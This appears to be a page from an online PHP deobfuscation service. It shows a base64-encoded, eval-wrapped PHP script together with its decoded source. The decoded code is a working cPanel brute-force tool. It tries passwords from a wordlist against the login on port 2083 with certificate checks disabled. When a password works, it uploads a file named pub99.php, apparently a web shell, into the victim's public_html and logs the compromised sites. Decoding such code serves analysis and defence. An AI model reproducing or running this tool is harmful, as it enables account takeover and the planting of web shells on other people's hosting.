Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
#!/usr/bin/php <?php eval(base64_decode("c2V0X3RpbWVfbGltaXQoMCk7CmZ1bmN0aW9uIHBhc3Nfc2l..
Decoded Output download
set_time_limit(0);
function pass_site($site)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_URL,$site);
curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
curl_setopt($curl,CURLOPT_TIMEOUT,7);
$exec = curl_exec($curl);
$info = curl_getinfo($curl);
if($info['http_code'] != 0)
{
return true;
}
else
{
return false;
}
}
function make_username($site)
{
if(eregi('https://',$site)) $site = str_replace("https://","",$site);
if(!eregi('www',$site)) $site = "www.".$site;
$site = explode(".",$site);
$site = str_replace("-","",$site[1]);
$username = substr($site,0,8);
return $username;
}
function post($site,$user,$pass)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl,CURLOPT_URL,$site."/login/?login_only=1");
curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl,CURLOPT_TIMEOUT,7);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,"user=$user&pass=$pass");
$exec = curl_exec($curl);
return $exec;
}
$passwords=file_get_contents("passwords.txt");
$site=$argv[1];
if(eregi('http',$site)){
$site = str_replace("http://","https://",$site);
}else{
$site = "https://$site";
}
$site= $site.":2083";
if(!pass_site($site))
{
die();
}
else {
$username=make_username($site);
$passwords=explode("
",$passwords);
foreach($passwords as $password){
if($password!=""){
$cracked = false;
$result=post($site,$username,$password);
if(preg_match('/security_token/',$result))
{
$cracked = true;
$site_a = str_replace("https://","",$site);
$site_b = str_replace(":2083","",$site_a);
$file = "pub99.php";
$request_uri = "https://$site_b:2083/execute/Fileman/upload_files";
$upload_file = realpath($file);
$destination_dir = "public_html";
if(function_exists('curl_file_create')) {
$cf = curl_file_create($upload_file);
} else {
$cf = "@/".$upload_file;
}
$payload = array(
'dir' => urlencode($destination_dir),
'file-1' => $cf
);
$ch = curl_init($request_uri);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, $username.':'.$password);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$curl_response = curl_exec($ch);
curl_close($ch);
$response = json_decode($curl_response);
//if (stripos($curl_response, "succeeded.") !== false) {
$ch = curl_init($site_b."/".$file);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$curl_response = curl_exec($ch);
curl_close($ch);
system("echo '$username@$site_b' >> _root.txt");
system("echo '$site_b' >> _done.txt");
system("echo '----' >> _done.txt");
//}
echo "ok; $site: $username
";
if(!($_OutFile = fopen("_vuln.txt", "a"))) ExitF ("Cannot open the log file");
fputs($_OutFile, "$site $username
");
break;
}
}
}}
Did this file decode correctly?
Original Code
#!/usr/bin/php
<?php
eval(base64_decode("c2V0X3RpbWVfbGltaXQoMCk7CmZ1bmN0aW9uIHBhc3Nfc2l0ZSgkc2l0ZSkKCXsKCQkJJGN1cmwg
PSBjdXJsX2luaXQoKTsKCQkJY3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZF
Uix0cnVlKTsKCQkJY3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9QVF9VUkwsJHNpdGUpOwoJCQljdXJs
X3NldG9wdCgkY3VybCxDVVJMT1BUX1NTTF9WRVJJRllIT1NULDApOwoJCQljdXJsX3NldG9wdCgk
Y3VybCxDVVJMT1BUX1NTTF9WRVJJRllQRUVSLDApOwoJCQljdXJsX3NldG9wdCgkY3VybCxDVVJM
T1BUX0ZPTExPV0xPQ0FUSU9OLHRydWUpOwoJCQljdXJsX3NldG9wdCgkY3VybCxDVVJMT1BUX1RJ
TUVPVVQsNyk7CgkJCSRleGVjID0gY3VybF9leGVjKCRjdXJsKTsKCQkJJGluZm8gPSBjdXJsX2dl
dGluZm8oJGN1cmwpOwoJCQkKCQkJaWYoJGluZm9bJ2h0dHBfY29kZSddICE9IDApCgkJCXsKCQkJ
cmV0dXJuIHRydWU7CgkJCX0KCQkJZWxzZQoJCQl7CgkJCXJldHVybiBmYWxzZTsKCQkJfQoJCgl9
CmZ1bmN0aW9uIG1ha2VfdXNlcm5hbWUoJHNpdGUpCgl7CgkJCgoJCQlpZihlcmVnaSgnaHR0cHM6
Ly8nLCRzaXRlKSkgJHNpdGUgID0gc3RyX3JlcGxhY2UoImh0dHBzOi8vIiwiIiwkc2l0ZSk7CgkJ
CWlmKCFlcmVnaSgnd3d3Jywkc2l0ZSkpCSAgICRzaXRlICA9ICJ3d3cuIi4kc2l0ZTsKCQkJCgkJ
CQoJCQkkc2l0ZQk9CWV4cGxvZGUoIi4iLCRzaXRlKTsKCQkJJHNpdGUJPSBzdHJfcmVwbGFjZSgi
LSIsIiIsJHNpdGVbMV0pOwoJCQkKCQkJJHVzZXJuYW1lID0gc3Vic3RyKCRzaXRlLDAsOCk7CgkJ
CQoJCQkKCQkJcmV0dXJuICR1c2VybmFtZTsKCX0KZnVuY3Rpb24gcG9zdCgkc2l0ZSwkdXNlciwk
cGFzcykKCXsKCQkJJGN1cmwgPSBjdXJsX2luaXQoKTsKCQkJY3VybF9zZXRvcHQoJGN1cmwsQ1VS
TE9QVF9SRVRVUk5UUkFOU0ZFUix0cnVlKTsKCQkJY3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9QVF9V
UkwsJHNpdGUuIi9sb2dpbi8/bG9naW5fb25seT0xIik7CgkJCWN1cmxfc2V0b3B0KCRjdXJsLENV
UkxPUFRfU1NMX1ZFUklGWUhPU1QsMCk7CgkJCWN1cmxfc2V0b3B0KCRjdXJsLENVUkxPUFRfU1NM
X1ZFUklGWVBFRVIsMCk7CgkJCWN1cmxfc2V0b3B0KCRjdXJsLENVUkxPUFRfVElNRU9VVCw3KTsK
CQkJY3VybF9zZXRvcHQoJGN1cmwsQ1VSTE9QVF9GT0xMT1dMT0NBVElPTix0cnVlKTsKCQkJY3Vy
bF9zZXRvcHQoJGN1cmwsQ1VSTE9QVF9QT1NULDEpOwoJCQljdXJsX3NldG9wdCgkY3VybCxDVVJM
T1BUX1BPU1RGSUVMRFMsInVzZXI9JHVzZXImcGFzcz0kcGFzcyIpOwoJCQkkZXhlYyA9IGN1cmxf
ZXhlYygkY3VybCk7CgkJCXJldHVybiAkZXhlYzsKCX0KJHBhc3N3b3Jkcz1maWxlX2dldF9jb250
ZW50cygicGFzc3dvcmRzLnR4dCIpOwoKJHNpdGU9JGFyZ3ZbMV07CgppZihlcmVnaSgnaHR0cCcs
JHNpdGUpKXsKJHNpdGUgPSBzdHJfcmVwbGFjZSgiaHR0cDovLyIsImh0dHBzOi8vIiwkc2l0ZSk7
Cn1lbHNleyAKJHNpdGUgPSAiaHR0cHM6Ly8kc2l0ZSI7Cn0KJHNpdGU9ICRzaXRlLiI6MjA4MyI7
CmlmKCFwYXNzX3NpdGUoJHNpdGUpKQp7CmRpZSgpOwp9CmVsc2UgewoKJHVzZXJuYW1lPW1ha2Vf
dXNlcm5hbWUoJHNpdGUpOwoKJHBhc3N3b3Jkcz1leHBsb2RlKCJcbiIsJHBhc3N3b3Jkcyk7Cgpm
b3JlYWNoKCRwYXNzd29yZHMgYXMgJHBhc3N3b3JkKXsKCWlmKCRwYXNzd29yZCE9IiIpewoJJGNy
YWNrZWQgPSBmYWxzZTsKCQoJJHJlc3VsdD1wb3N0KCRzaXRlLCR1c2VybmFtZSwkcGFzc3dvcmQp
OwoJCglpZihwcmVnX21hdGNoKCcvc2VjdXJpdHlfdG9rZW4vJywkcmVzdWx0KSkKCXsKCSRjcmFj
a2VkID0gdHJ1ZTsKICAgICAgICAkc2l0ZV9hID0gc3RyX3JlcGxhY2UoImh0dHBzOi8vIiwiIiwk
c2l0ZSk7CiAgICAgICAgJHNpdGVfYiA9IHN0cl9yZXBsYWNlKCI6MjA4MyIsIiIsJHNpdGVfYSk7
CgokZmlsZSA9ICJwdWI5OS5waHAiOwokcmVxdWVzdF91cmkgPSAiaHR0cHM6Ly8kc2l0ZV9iOjIw
ODMvZXhlY3V0ZS9GaWxlbWFuL3VwbG9hZF9maWxlcyI7CiR1cGxvYWRfZmlsZSA9IHJlYWxwYXRo
KCRmaWxlKTsKJGRlc3RpbmF0aW9uX2RpciA9ICJwdWJsaWNfaHRtbCI7CgppZihmdW5jdGlvbl9l
eGlzdHMoJ2N1cmxfZmlsZV9jcmVhdGUnKSkgewogICAgICAgICRjZiA9IGN1cmxfZmlsZV9jcmVh
dGUoJHVwbG9hZF9maWxlKTsKfSBlbHNlIHsKICAgICAgICAkY2YgPSAiQC8iLiR1cGxvYWRfZmls
ZTsKfQogICAgICAgICRwYXlsb2FkID0gYXJyYXkoCiAgICAgICAgICAgICAgICAnZGlyJyA9PiB1
cmxlbmNvZGUoJGRlc3RpbmF0aW9uX2RpciksCiAgICAgICAgICAgICAgICAnZmlsZS0xJyA9PiAk
Y2YKKTsKCiRjaCA9IGN1cmxfaW5pdCgkcmVxdWVzdF91cmkpOwpjdXJsX3NldG9wdCgkY2gsIENV
UkxPUFRfSFRUUEFVVEgsIENVUkxBVVRIX0JBU0lDKTsKY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BU
X1VTRVJQV0QsICR1c2VybmFtZS4nOicuJHBhc3N3b3JkKTsKY3VybF9zZXRvcHQoJGNoLCBDVVJM
T1BUX1NTTF9WRVJJRllIT1NULCBmYWxzZSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xf
VkVSSUZZUEVFUiwgZmFsc2UpOwpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVCwgdHJ1ZSk7
CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NURklFTERTLCAkcGF5bG9hZCk7CmN1cmxfc2V0
b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgdHJ1ZSk7CiRjdXJsX3Jlc3BvbnNlID0g
Y3VybF9leGVjKCRjaCk7CmN1cmxfY2xvc2UoJGNoKTsKJHJlc3BvbnNlID0ganNvbl9kZWNvZGUo
JGN1cmxfcmVzcG9uc2UpOwoKLy9pZiAoc3RyaXBvcygkY3VybF9yZXNwb25zZSwgInN1Y2NlZWRl
ZC4iKSAhPT0gZmFsc2UpIHsKICAgICAgICAkY2ggPSBjdXJsX2luaXQoJHNpdGVfYi4iLyIuJGZp
bGUpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgdHJ1
ZSk7CiAgICAgICAgJGN1cmxfcmVzcG9uc2UgPSBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICBjdXJs
X2Nsb3NlKCRjaCk7CglzeXN0ZW0oImVjaG8gJyR1c2VybmFtZUAkc2l0ZV9iJyA+PiBfcm9vdC50
eHQiKTsKICAgICAgICBzeXN0ZW0oImVjaG8gJyRzaXRlX2InID4+IF9kb25lLnR4dCIpOwogICAg
ICAgIHN5c3RlbSgiZWNobyAnLS0tLScgPj4gX2RvbmUudHh0Iik7Ci8vfQoKCWVjaG8gIm9rOyAk
c2l0ZTogJHVzZXJuYW1lXHJcbiI7CglpZighKCRfT3V0RmlsZSA9IGZvcGVuKCJfdnVsbi50eHQi
LCAiYSIpKSkgRXhpdEYgKCJDYW5ub3Qgb3BlbiB0aGUgbG9nIGZpbGUiKTsKICAgICAgICBmcHV0
cygkX091dEZpbGUsICIkc2l0ZSAkdXNlcm5hbWVcclxuIik7CglicmVhazsKCX0KCQoJCn0KfX0K"))
?>
Function Calls
| base64_decode | 1 |
Stats
| MD5 | 11e5eb88113b0be2eaf34376d8751525 |
| Eval Count | 1 |
| Decode Time | 87 ms |